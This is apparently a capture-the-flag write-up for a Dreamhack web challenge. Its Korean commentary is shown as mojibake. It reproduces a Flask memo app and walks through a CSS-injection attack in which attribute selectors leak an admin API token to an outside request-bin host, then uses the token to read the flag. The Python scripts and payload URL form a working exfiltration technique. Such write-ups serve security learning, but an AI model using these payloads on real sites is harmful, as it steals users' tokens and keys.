1. ๋ฌธ์
https://dreamhack.io/wargame/challenges/421
2. ํด๊ฒฐ ๊ณผ์
(1) ์ฝ๋ ๋ถ์
์ ์ฒด ์ฝ๋
#!/usr/bin/python3
import hashlib, os, binascii, random, string
from flask import Flask, request, render_template, redirect, url_for, session, g, flash
from functools import wraps
import sqlite3
from selenium import webdriver
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.common.by import By
from promise import Promise
app = Flask(__name__)
app.secret_key = os.urandom(32)
DATABASE = os.environ.get("DATABASE", "database.db")
try:
FLAG = open("./flag.txt", "r").read().strip()
except:
FLAG = "[**FLAG**]"
ADMIN_USERNAME = "administrator"
ADMIN_PASSWORD = binascii.hexlify(os.urandom(32))
def execute(query, data=()):
con = sqlite3.connect(DATABASE)
cur = con.cursor()
cur.execute(query, data)
con.commit()
data = cur.fetchall()
con.close()
return data
def token_generate():
while True:
token = "".join(random.choice(string.ascii_lowercase) for _ in range(8))
token_exists = execute(
"SELECT * FROM users WHERE token = :token;", {"token": token}
)
if not token_exists:
return token
def login_required(view):
@wraps(view)
def wrapped_view(**kwargs):
if session and session["uid"]:
return view(**kwargs)
flash("login first !")
return redirect(url_for("login"))
return wrapped_view
def apikey_required(view):
@wraps(view)
def wrapped_view(**kwargs):
apikey = request.headers.get("API-KEY", None)
token = execute("SELECT * FROM users WHERE token = :token;", {"token": apikey})
if token:
request.uid = token[0][0]
return view(**kwargs)
return {"code": 401, "message": "Access Denined !"}
return wrapped_view
@app.teardown_appcontext
def close_connection(exception):
db = getattr(g, "_database", None)
if db is not None:
db.close()
@app.context_processor
def background_color():
color = request.args.get("color", "white")
return dict(color=color)
@app.route("/")
def index():
return render_template("index.html")
@app.route("/login", methods=["GET", "POST"])
def login():
if request.method == "GET":
return render_template("login.html")
else:
username = request.form.get("username")
password = request.form.get("password")
user = execute(
"SELECT * FROM users WHERE username = :username and password = :password;",
{
"username": username,
"password": hashlib.sha256(password.encode()).hexdigest(),
},
)
if user:
session["uid"] = user[0][0]
session["username"] = user[0][1]
return redirect(url_for("index"))
flash("Wrong username or password !")
return redirect(url_for("login"))
@app.route("/logout")
@login_required
def logout():
session.clear()
flash("Logout !")
return redirect(url_for("index"))
@app.route("/register", methods=["GET", "POST"])
def register():
if request.method == "GET":
return render_template("register.html")
else:
username = request.form.get("username")
password = request.form.get("password")
user = execute(
"SELECT * FROM users WHERE username = :username;", {"username": username}
)
if user:
flash("Username already exists !")
return redirect(url_for("register"))
token = token_generate()
sql = "INSERT INTO users(username, password, token) VALUES (:username, :password, :token);"
execute(
sql,
{
"username": username,
"password": hashlib.sha256(password.encode()).hexdigest(),
"token": token,
},
)
flash("Register Success.")
return redirect(url_for("login"))
@app.route("/mypage")
@login_required
def mypage():
user = execute("SELECT * FROM users WHERE uid = :uid;", {"uid": session["uid"]})
return render_template("mypage.html", user=user[0])
@app.route("/memo", methods=["GET", "POST"])
@login_required
def memopage():
if request.method == "GET":
memos = execute("SELECT * FROM memo WHERE uid = :uid;", {"uid": session["uid"]})
return render_template("memo.html", memos=memos)
else:
memo = request.form.get("memo")
sql = "INSERT INTO memo(uid, text) VALUES(:uid, :text);"
execute(sql, {"uid": session["uid"], "text": memo})
return redirect(url_for("memopage"))
# report
@app.route("/report", methods=["GET", "POST"])
def report():
if request.method == "POST":
path = request.form.get("path")
if not path:
flash("fail.")
return redirect(url_for("report"))
if path and path[0] == "/":
path = path[1:]
url = f"http://127.0.0.1:8000/{path}"
if check_url(url):
flash("success.")
else:
flash("fail.")
return redirect(url_for("report"))
elif request.method == "GET":
return render_template("report.html")
def check_url(url):
try:
service = Service(executable_path="/chromedriver")
options = webdriver.ChromeOptions()
for _ in [
"headless",
"window-size=1920x1080",
"disable-gpu",
"no-sandbox",
"disable-dev-shm-usage",
]:
options.add_argument(_)
driver = webdriver.Chrome(service=service, options=options)
driver.implicitly_wait(3)
driver.set_page_load_timeout(3)
driver_promise = Promise(driver.get("http://127.0.0.1:8000/login"))
driver_promise.then(
driver.find_element(By.NAME, "username").send_keys(str(ADMIN_USERNAME))
)
driver_promise.then(
driver.find_element(By.NAME, "password").send_keys(ADMIN_PASSWORD.decode())
)
driver_promise = Promise(driver.find_element(By.ID, "submit").click())
driver_promise.then(driver.get(url))
except Exception as e:
driver.quit()
return False
finally:
driver.quit()
return True
# API
@app.route("/api/me")
@apikey_required
def APIme():
user = execute("SELECT * FROM users WHERE uid = :uid;", {"uid": request.uid})
if user:
return {"code": 200, "uid": user[0][0], "username": user[0][1]}
return {"code": 500, "message": "Error !"}
@app.route("/api/memo")
@apikey_required
def APImemo():
memos = execute("SELECT * FROM memo WHERE uid = :uid;", {"uid": request.uid})
if memos:
memo = []
for tmp in memos:
memo.append({"idx": tmp[0], "memo": tmp[2]})
return {"code": 200, "memo": memo}
return {"code": 500, "message": "Error !"}
# For Challenge
def init():
execute("DROP TABLE IF EXISTS users;")
execute(
"""
CREATE TABLE users (
uid INTEGER PRIMARY KEY,
username TEXT NOT NULL UNIQUE,
password TEXT NOT NULL,
token TEXT NOT NULL UNIQUE
);
"""
)
execute("DROP TABLE IF EXISTS memo;")
execute(
"""
CREATE TABLE memo (
idx INTEGER PRIMARY KEY,
uid INTEGER NOT NULL,
text TEXT NOT NULL
);
"""
)
# Add admin
execute(
"INSERT INTO users (username, password, token)"
"VALUES (:username, :password, :token);",
{
"username": ADMIN_USERNAME,
"password": hashlib.sha256(ADMIN_PASSWORD).hexdigest(),
"token": token_generate(),
},
)
adminUid = execute(
"SELECT * FROM users WHERE username = :username;", {"username": ADMIN_USERNAME}
)
# Add FLAG
execute(
"INSERT INTO memo (uid, text)" "VALUES (:uid, :text);",
{"uid": adminUid[0][0], "text": "FLAG is " + FLAG},
)
with app.app_context():
init()
if __name__ == "__main__":
app.run(host="0.0.0.0", port=8000)
(init) ์๋ฒ๊ฐ ์์๋๋ฉด์, admin ๊ณ์ ์ด ์์ฑ๋๊ณ admin ๊ณ์ ์ ๋ฉ๋ชจ๊ฐ ์์ฑ๋๋ค.
์ด๋ ๋ฉ๋ชจ์ ํ๋๊ทธ๊ฐ ์ ์ฅ๋๋ค. ์ฆ, ํ๋๊ทธ๋ admin ๊ณ์ ์ ๋ฉ๋ชจ์ ์กด์ฌํ๋ค.
# Add admin
execute(
"INSERT INTO users (username, password, token)"
"VALUES (:username, :password, :token);",
{
"username": ADMIN_USERNAME,
"password": hashlib.sha256(ADMIN_PASSWORD).hexdigest(),
"token": token_generate(),
},
)
adminUid = execute(
"SELECT * FROM users WHERE username = :username;", {"username": ADMIN_USERNAME}
)
# Add FLAG
execute(
"INSERT INTO memo (uid, text)" "VALUES (:uid, :text);",
{"uid": adminUid[0][0], "text": "FLAG is " + FLAG},
)
ํ์๊ฐ์ ์ ํ๋ฉด, username, password, token์ sql์ ์ฝ์ ํ๋ค.
@app.route("/register", methods=["GET", "POST"])
def register():
if request.method == "GET":
return render_template("register.html")
else:
username = request.form.get("username")
password = request.form.get("password")
user = execute(
"SELECT * FROM users WHERE username = :username;", {"username": username}
)
if user:
flash("Username already exists !")
return redirect(url_for("register"))
token = token_generate()
sql = "INSERT INTO users(username, password, token) VALUES (:username, :password, :token);"
execute(
sql,
{
"username": username,
"password": hashlib.sha256(password.encode()).hexdigest(),
"token": token,
},
)
flash("Register Success.")
return redirect(url_for("login"))
ํ ํฐ์ 8์๋ฆฌ ์๋ฌธ์๋ก ๊ตฌ์ฑ๋๋ค.
def token_generate():
while True:
token = "".join(random.choice(string.ascii_lowercase) for _ in range(8))
token_exists = execute(
"SELECT * FROM users WHERE token = :token;", {"token": token}
)
if not token_exists:
return token
mypage์์ ํ ํฐ๊ฐ์ ํ์ธํ ์ ์๋ค.
@app.route("/mypage")
@login_required
def mypage():
user = execute("SELECT * FROM users WHERE uid = :uid;", {"uid": session["uid"]})
return render_template("mypage.html", user=user[0])
/report ํ์ด์ง์์ path๋ฅผ ์ ๋ ฅ๋ฐ์ check_url()์ ๋๊ธด๋ค.
# report
@app.route("/report", methods=["GET", "POST"])
def report():
if request.method == "POST":
path = request.form.get("path")
if not path:
flash("fail.")
return redirect(url_for("report"))
if path and path[0] == "/":
path = path[1:]
url = f"http://127.0.0.1:8000/{path}"
if check_url(url):
flash("success.")
else:
flash("fail.")
return redirect(url_for("report"))
elif request.method == "GET":
return render_template("report.html")
check_url์ admin ๊ณ์ ์ ๋ก๊ทธ์ธํ ๋ค ๊ฒฐ๊ณผ๊ฐ์ ๋ฆฌํดํด์ค๋ค.
- ๋ก์ปฌ์ ๋ก๊ทธ์ธ ํ์ด์ง ์ ์
- admin ๊ณ์ ์ผ๋ก ๋ก๊ทธ์ธ
- url ์ ์
์ฆ, /report ํ์ด์ง๋ admin ๊ณ์ ์ ๊ถํ์ผ๋ก ํ์ด์ง๋ฅผ ๋์๋ค๋ ์ ์๋๋ก ํด์ค๋ค.
def check_url(url):
try:
service = Service(executable_path="/chromedriver")
options = webdriver.ChromeOptions()
for _ in [
"headless",
"window-size=1920x1080",
"disable-gpu",
"no-sandbox",
"disable-dev-shm-usage",
]:
options.add_argument(_)
driver = webdriver.Chrome(service=service, options=options)
driver.implicitly_wait(3)
driver.set_page_load_timeout(3)
driver_promise = Promise(driver.get("http://127.0.0.1:8000/login"))
driver_promise.then(
driver.find_element(By.NAME, "username").send_keys(str(ADMIN_USERNAME))
)
driver_promise.then(
driver.find_element(By.NAME, "password").send_keys(ADMIN_PASSWORD.decode())
)
driver_promise = Promise(driver.find_element(By.ID, "submit").click())
driver_promise.then(driver.get(url))
except Exception as e:
driver.quit()
return False
finally:
driver.quit()
return True
/api/me , /api/memo ์ ์ ์ํ๊ธฐ ์ํด์๋ @apikey_required ๋ถํฐ ํต๊ณผํด์ผ ํ๋ค.
uid์ ๊ฒฐ๊ณผ, ํด๋น ๊ฐ์ด user[0][0]์ผ ๋์๋ง 200 ์ฝ๋๋ฅผ ๋ฆฌํดํด์ค๋ค -> admin
์ฆ, admin์ธ ๊ฒ์ด ํ์ธ๋๋ฉด users ํ ์ด๋ธ์์ ์ ๋ณด๋ฅผ ์ถ๋ ฅํด์ฃผ๊ณ , memo ํ ์ด๋ธ์์ ๋ฉ๋ชจ๋ฅผ ์ถ๋ ฅํด์ค๋ค.
# API
@app.route("/api/me")
@apikey_required
def APIme():
user = execute("SELECT * FROM users WHERE uid = :uid;", {"uid": request.uid})
if user:
return {"code": 200, "uid": user[0][0], "username": user[0][1]}
return {"code": 500, "message": "Error !"}
@app.route("/api/memo")
@apikey_required
def APImemo():
memos = execute("SELECT * FROM memo WHERE uid = :uid;", {"uid": request.uid})
if memos:
memo = []
for tmp in memos:
memo.append({"idx": tmp[0], "memo": tmp[2]})
return {"code": 200, "memo": memo}
return {"code": 500, "message": "Error !"}
apikey๋ ํค๋์ ์๋ API-KEY๋ฅผ ๊ฐ์ ธ์ token(api key)๋ฅผ ํ์ธํ๊ณ ,
ํด๋น ๊ณ์ ์ด token[0][0], ์ฆ admin์ด๋ฉด ๊ฒฐ๊ณผ๋ฅผ ๋ฐํํด์ฃผ๊ณ , ์๋๋ผ๋ฉด 401 ์ฝ๋๋ฅผ ๋ฐํํ๋ค.
def apikey_required(view):
@wraps(view)
def wrapped_view(**kwargs):
apikey = request.headers.get("API-KEY", None)
token = execute("SELECT * FROM users WHERE token = :token;", {"token": apikey})
if token:
request.uid = token[0][0]
return view(**kwargs)
return {"code": 401, "message": "Access Denined !"}
return wrapped_view
์ฆ, ์ฐ๋ฆฌ๋ ํ๋๊ทธ๋ฅผ ์ฐพ๊ธฐ ์ํด admin ๊ณ์ ์ memo๋ฅผ ํ์ธํด์ผ ํ๋ค
(1) api/memo์์๋ API-KEY๋ง์ผ๋ก admin ๊ณ์ ์ ๋ฉ๋ชจ๋ฅผ ํ์ธํ ์ ์๋ค.
(2) ์ฐ๋ฆฌ๋ report๋ก admin ๊ณ์ ์ ์ ๊ทผํ ์ ์๋ค.
+) ๋ฌธ์ ์์ ๋๋๊ณ css injection์ด๋ผ๊ณ ๋ช ์ํ์ง๋ง, ํด๋น ๋ฌธ์ ๋ฅผ css injection์ผ๋ก ํ์ด์ผ ํ๋ ์ด์ ๋ฅผ ์ฐพ๊ณ ์ถ์๋ค.
์๊น ์ฝ๋ ๋ถ์๊ณผ์ ์์ ๋์ณค๋ ๋ถ๋ถ์ด ์๋๋ฐ ํ์ด์ง์ ๋ฐฐ๊ฒฝ color๊ฐ์ get ์์ฒญ์ ํตํด ๋ฐ๋๋ค.
์ฆ, ์์ฒญ์ ํตํด ๋ธ๋ผ์ฐ์ ์์ background ์ปฌ๋ฌ(CSS)๋ฅผ ๋ฐ๊ฟ ์ ์์ผ๋ฉฐ, ์ด ๋ถ๋ถ์ ์ด์ฉํด์ css injection์ด ๊ฐ๋ฅํ๋ค๋ ๊ฒ์ ์ ์์๋ค.
@app.context_processor
def background_color():
color = request.args.get("color", "white")
return dict(color=color)
์ฟผ๋ฆฌ์คํธ๋ง์ผ๋ก color=yellow๋ฅผ ์ฃผ๋, ๋ฐฐ๊ฒฝํ๋ฉด์ ์ปฌ๋ฌ๊ฐ ์ค์ ๋ก ๋ฐ๋๋ ๊ฒ์ ํ์ธํ ์ ์๋ค.
์ด์ด์, ํ ์คํธ๋ฅผ ์ํด mnzy/test๋ก ํ์๊ฐ์ ํ ๋ก๊ทธ์ธ์ ํ๋ค.
/mypage์๋ API Token์ด ๋ฐ๋ก ์ถ๋ ฅ๋๋ค.
๊ฐ๋ฐ์๋๊ตฌ๋ฅผ ํ์ธํด๋ณด๋ฉด api key๊ฐ text๋ก inputApitoken์ ๋ค์ด๊ฐ๋ ๊ฒ์ ํ์ธํ ์ ์๋ค.
์ด์ฒ๋ผ ์น ํ์ด์ง์ ์ง์ ์ ์ผ๋ก ๋ณด์ฌ์ง๋ ๊ฐ์ CSS ์ ํ์(Selector)๋ฅผ ํตํด ํํ์ด ๊ฐ๋ฅํ๋ค.
๊ณต๊ฒฉ์๊ฐ ์์ CSS ์์ฑ์ ์ฝ์ ํด ์นํ์ด์ง์ UI (์๊น์)๋ฅผ ๋ณ์กฐํ๊ฑฐ๋ CSS ์์ฑ์ ๋ค์ํ ๊ธฐ๋ฅ์ ํตํด ์น ํ์ด์ง๋ด์ ๋ฐ์ดํฐ๋ฅผ ์ธ๋ถ๋ก ํ์น ์ ์๋ค. ๋ฐ์ดํฐ์ ์๋ก๋ CSRF Token, ํผํด์์ API Key๋ฑ ์น ํ์ด์ง์ ์ง์ ์ ์ผ๋ก ๋ณด์ฌ์ง๋ ๊ฐ์ฒ๋ผ CSS ์ ํ์(Selector)๋ฅผ ํตํด ํํ์ด ๊ฐ๋ฅํด์ผ ํ๋ค.
์ ๋ฆฌํด๋ณด์๋ฉด
/mypage์์๋ token๊ฐ์ ๋ฐ๋ก ํ์ธํ ์ ์๋ค.
๋ฐ๋ผ์, /report ํ์ด์ง์์ css selector๋ฅผ ์ด์ฉํ์ฌ mypage์ ํ ํฐ๊ฐ์ ํ์ทจํด์ค๋ ์ฝ๋๋ฅผ ์์ฑํ๋ฉด ๋๋ค.
(2) ์ต์คํ๋ก์
ํ์ด๋ก๋๋ ์ฟผ๋ฆฌ๊ฐ์ผ๋ก mypage์ ์ ๊ทผํด์ ์ง์ ํ ์๋ฒ๋ก ping์ ๋ณด๋ด๋๋ก ํ ๊ฒ์ด๋ค.
ํน์๋ฌธ์ ๋ฑ์ ๋ํ ํํฐ๋ง์ด ์ ํ ์์ผ๋ฏ๋ก, ํ์๋ง ์ ์ ๊ฒฝ์จ์ ์์ฒญ์ ๋ณด๋ด๋ฉด ๋๋ค.
์ฐ๋ฆฌ๋ inputApitoken์ value ๊ฐ์ด ๊ฐ์ฅ ์ฒซ ๊ธ์๋ถํฐ ํ๋์ฉ ๊ฐ์ ธ์ฌ ๊ฒ์ด๋ค.
selector 2๊ฐ๋ฅผ ํตํด id์ value๊ฐ์ ์ง์ ํด์ฃผ๋๋ฐ, value์ ๊ฒฝ์ฐ ์๊ฒ ๋ ๋ฌธ์์ด + ์๋ ๋ฌธ์์ ํ์์ผ๋ก token์ ์์๋ด๋๋ก ํ ๊ฒ์ด๋ค. -> selector ํ์: [attr=value] / [attr^=value]
์ฐธ๊ณ : https://developer.mozilla.org/ko/docs/Web/CSS/Attribute_selectors
http://host3.dreamhack.games:21675/mypage?color=white;} input[id=InputApitoken][value^="+curr+token+"] {background: url(https://azcqvch.request.dreamhack.games/"+curr+token+");"}
๋ฐ๋ผ์ ์๋์ ๊ฐ์ ์ฝ๋๋ฅผ ์์ฑํ์๋ค.
ํ ๋ฒ์ ํ ํฐ ๊ฐ์ ์์๋ผ ์ ์๋ ์ฝ๋๋ฅผ ์์ฑํ๊ณ ์ถ์๋๋ฐ, ์คํจํด์ ํ ๊ธ์์ฉ ์์๋ด๋ ์ฝ๋๋ก ์์ฑํด์ ํ๋์ฉ ์์๋๋ค.
๊ธ์ ์์๋ด๋ฉด curr์ ์์์ ์ผ๋ก ์ถ๊ฐํด์ผ๋จ..ใ
import requests, string
URL = "http://host3.dreamhack.games:12465/report"
curr= ""
for token in string.ascii_lowercase:
data = {"path":"mypage?color=white;} input[id=InputApitoken][value^="+curr+token+"] {background: url(https://azcqvch.request.dreamhack.games/"+curr+token+");"}
response = requests.post(URL, data=data)
print(f"'{token}': Status {response.status_code}")
admin์ ํ ํฐ๊ฐ์ ์์๋ด๋๋ฐ ์ฑ๊ณตํ๋ฉด, ์ด ํ ํฐ๊ฐ์ ์ด์ฉํด์ api/memo ์ ์ ๊ทผํ ๊ฒ์ด๋ค.
์ด ํ ํฐ๊ฐ์ ๊ฐ์ง๊ณ api/memo์ ์์ฒญ์ ๋ณด๋ด์ด ๋ด์ฉ์ ํ์ฑํด์ ํ๋๊ทธ๊ฐ์ ์ถ์ถํด๋ผ ์ ์๋ค.
import requests
URL = "http://host3.dreamhack.games:21675/api/memo"
TOKEN = "ykpnimfn"
headers = {
"API-KEY": TOKEN
}
response = requests.get(URL, headers=headers)
# ์๋ต ํ์ธ
if response.status_code == 200:
print("Request successful!")
response_data = response.json()
if response_data['code'] == 200:
# ๋ฉ๋ชจ ๋ฐ์ดํฐ ํ์ฑ ๋ฐ ์ถ๋ ฅ
memos = response_data['memo']
for memo in memos:
print(f"Memo index: {memo['idx']}, Memo content: {memo['memo']}")
else:
print(f"Error: {response_data['message']}")
else:
print(f"Failed to fetch data. Status code: {response.status_code}")
์ฑ๊ณต